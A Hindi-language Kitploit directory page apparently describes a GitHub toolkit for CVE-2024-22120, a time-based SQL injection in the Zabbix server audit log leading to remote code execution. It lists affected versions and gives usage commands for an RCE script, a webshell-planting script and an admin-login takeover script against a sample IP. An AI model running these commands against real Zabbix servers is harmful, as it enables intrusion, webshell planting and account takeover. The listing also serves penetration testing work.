Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-22120-RCE — Zabbix सर्वर ऑडिट लॉग में समय-आधारित SQL इंजेक्शन --> RCE | Kitploit
उपकरण/GitHubGitHub/w01fh4cker/cve-2024-22120-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubw01fh4cker/cve-2024-22120-rce

CVE-2024-22120-RCE

Zabbix सर्वर ऑडिट लॉग में समय-आधारित SQL इंजेक्शन --> RCE

रिपॉजिटरी देखें
1402222 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-22120 टूलकिट

प्रभावित संस्करण

root@kitploit:~
6.0.0 - 6.0.27
6.4.0 - 6.4.12
7.0.0alpha1

श्रेय

https://x.com/mf0cuz

https://support.zabbix.com/browse/ZBX-24505

https://packetstormsecurity.com/files/137454/Zabbix-3.0.3-Remote-Command-Execution.html

पूर्वापेक्षा

  • कम-विशेषाधिकार वाला उपयोगकर्ता

  • स्क्रिप्ट निष्पादित करने की अनुमति हो

उपयोग

CVE-2024-22120-RCE

sessionid और hostid प्राप्त करने के लिए पैकेट कैप्चर करें:

root@kitploit:~
python -m pip install requests pwntools

python CVE-2024-22120-RCE.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084

CVE-2024-22120-Webshell(अधिकांश मामलों में उपयोग नहीं किया जा सकता)

यदि आपके पास पहले से Administrator विशेषाधिकार वाले उपयोगकर्ता का session ID है, तो प्रयास करें:

root@kitploit:~
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --aid fe647173d7769d55a43f161a68b256e0 --hostid 10084 --file shell.php

अन्यथा:

root@kitploit:~
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084 --shell shell.php

लेकिन अधिकांश मामलों में echo के माध्यम से webshell नहीं लिखा जा सकता, क्योंकि निष्पादन उपयोगकर्ता zabbix है:

CVE-2024-22120-LoginAsAdmin

root@kitploit:~
python CVE-2024-22120-LoginAsAdmin.py --ip 192.168.198.136 --sid decf4ef56988027d62ca1db2a00d8346 --hostid 10084

परीक्षण:

बदलें फिर रीफ़्रेश करें:

admin के रूप में लॉगिन करें!!!

टूल डाउनलोड करें